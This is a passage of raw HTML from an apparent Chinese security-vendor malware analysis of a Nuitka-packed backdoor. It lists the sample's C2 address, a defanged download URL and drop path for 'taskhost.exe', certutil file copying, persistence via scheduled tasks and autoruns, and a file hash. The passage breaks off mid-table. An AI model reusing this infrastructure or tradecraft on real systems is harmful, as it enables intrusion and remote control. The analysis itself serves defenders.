style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.24328593996840442" data-w="633" style="width: 553.74px;height: 134.67px;" src="https://wechat2rss.xlab.app/img-proxy/?k=1dd49ed4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJJqCCw2dZ9lmeT2aB3KwwtCiaZLibn4Lfcq3VF5NuTl0DyKP3WdibGRr6m0znvEYNI9icXRNng6Lj0F0RXSbibib9ZoIyoticsVgHbIw%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou15wf">从socket模块中，获取socket类。</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.30962962962962964" data-w="675" style="width: 553.74px;height: 171.4px;" src="https://wechat2rss.xlab.app/img-proxy/?k=170d394c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLkqkW5kKaztkXJ5BLZjMhaN5fcZAmY6oxsPAibgYiatIgIlgibW7Mu4A2jJhwHt7zY2Ao7hJ8cfDvOU6WczIib42xFRGqlseUQSy4%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgouwe1">获取socket类中AddressFamily_type，等同于代码“socket.AF_INET”。</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.25170068027210885" data-w="735" style="width: 553.74px;height: 139.34px;" src="https://wechat2rss.xlab.app/img-proxy/?k=1060ef3e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJItu4sG2QtK5qCcpzPmAsaicR2F5ByenIsoMGqH0qgEOqxyOlxXZA3u0Sh11KFib3OdH3ozUzsw28MoFegJxEchjOn3kujsS5V0%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1s1h">最后执行socket类的构造函数，创建一个socket对象。</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1867704280155642" data-w="771" style="width: 553.74px;height: 103.4px;" src="https://wechat2rss.xlab.app/img-proxy/?k=7c44edbd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXIM9MOic9rlF56uPJ7GUibKcaMWnYGUC1K6euib8qibCqfpmYrhNZ5eVyibWybTjyvUsNXpdv3mpvuGEk3ndZ6gR5KicSOFdNpICia7Xk%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span mpa-font-style="mo19dgouacq" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">4）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">样本连接C2：89.46.236.152:443。</span></span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.2073529411764706" data-w="680" style="width: 553.74px;height: 114.8px;" src="https://wechat2rss.xlab.app/img-proxy/?k=e204f304&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJ5vWDAkqibwyEnUKKLet2nlJjp5fkUAROib0hiaLticZtXEyYAicHPvF4wb7Bx83XXJEmWHbqNkZXtI5Zx1k07WNA4S3hdUl6lLMgA%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span><o:page></o:page></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1tjj">本次NUITKA样本，需接收C2传来的cmd命令，才会执行才会进行后续操作。本次捕获到的C2命令分为五类：</span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgoufvi">第一类：获取系统信息</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4164705882352941" data-w="425" style="width: 425.01px;height: 177px;" src="https://wechat2rss.xlab.app/img-proxy/?k=81ce07fc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJLy3Wa1jvrIBabX4ZgSGuhlIko8PT4svLNNlQogSZ4EkA3icLd2t3QHy8iaTRbe86T0Qn9IWUBa23uZvtjIgVqHQqGicuicKeohrA%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgouz3l">第二类：下载后续组件</span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou17cb">捕获到url：</span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou2c0"><a href="https://domainnamevalidator[.]com/uploads/taskhost" target="_blank">https://domainnamevalidator[.]com/uploads/taskhost</a></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1smh">保存到c:\programdata\usoshared\taskhost.exe</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.055710306406685235" data-w="1077" style="width: 553.74px;height: 30.87px;" src="https://wechat2rss.xlab.app/img-proxy/?k=99816298&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLGwueghRias0xyEcf0XSLsZYT2NlWu7a7rUhgshOQiaaVJplQiaOFlGWKVDOxJibiabyrS3X5aD1UXSaCnJ7oDptYrj7IOicNyfl3vM%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1vle">第三类：样本复制</span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1a73">通过certutil来进行文件复制</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1046712802768166" data-w="1156" style="width: 553.74px;height: 57.93px;" src="https://wechat2rss.xlab.app/img-proxy/?k=474681af&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJNTE198fTDVC593ZPWumpqVuicKWicLN1N9aDGDwQS13g5HLTVlWaEDl5piafnYM35xECwogibiaqCpWhWrcM3R87v9mZ9Z3w6QgXY%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou21l4">第四类：配置计划任务、启动项、开始菜单快捷方式。</span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgoutag"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;">注：未捕获到样本</span></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou23y2">%LocalAppData%\\Microsoft\\WindowsApps\\MsEdge.exe</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1340782122905028" data-w="1432" style="width: 553.74px;height: 74.27px;" src="https://wechat2rss.xlab.app/img-proxy/?k=9ab6e8c3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJFawjBZ1t9OtdNutvn7e6ztqBwWrvickIJTYZJye4icrGmiaibkvKGxJFFxeFob2y48TvuUYPKEmKZrCBA9IiaPhBjnM3BszsLrubA%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgouexp">第五类：解压需要使用的组件，如：python</span><o:page></o:page></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou20sq"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;">注：未捕获到myarchive.rar文件。</span></span></p><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou1u21">python.zip为正常的python安装包。安装包会保存到%userprofile%\downloads中。该python版本是312。</span></p><p style="text-indent: 0px;margin-top: 16px;margin-bottom: 16px;line-height: 1.6em;text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.10436713545521836" data-w="1351" style="width: 553.74px;height: 57.8px;" src="https://wechat2rss.xlab.app/img-proxy/?k=1ee85617&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKuexfmUGWWvsJRiatpAvpoR4XzZLn62Pl2EAuIvl15LA7zpVhAickbKiavhxOmhibuJ2arWicVTCtE2niclIk8JzVTZcFkscfndCibUw%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="margin: 16px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">3.</span></span><span mpa-font-style="mo19dgou125l"><span leaf="" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">攻击组件分析</span></span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="font-weight:bold;"><p style="margin: 16px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19dgou4r2"><span textstyle="" style="font-weight: bold;">shell后门组件</span></span></p></li></ul><p style="margin: 16px 0px;text-indent: 2em;line-height: 1.6em;"><span lang="EN-US" mpa-font-style="mo19dgou1hqq" style="font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);letter-spacing: 0.034em;font-style: normal;font-weight: normal;">该组件主要功能为执行C2传输的cmd指令。</span></span></p><div style="margin-left: 0;margin-right: 0;"><div><div><div><div><div><div><div><div><p><table style="width:481px;"><tbody><tr><td data-colwidth="127"><p><span style="font-size: 16px;"><span leaf="">MD5</span></span></p></td><td data-colwidth="354"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">23f5e51bf6d540553aa88c48480450a8</span></span></span></td></tr><tr><td data-colwidth="127"><p><span style="font-size: 16px;"><span leaf="">文件名称</span></span></p></td><td data-colwidth="354"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 16px;"><span leaf="">taskhost.exe</span></span></span></td></tr><tr><td data-colwidth="127"><p><span style="font-size: 16px;"><span leaf="">文件大小</span></span></p></td><td data-colwidth="354"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang 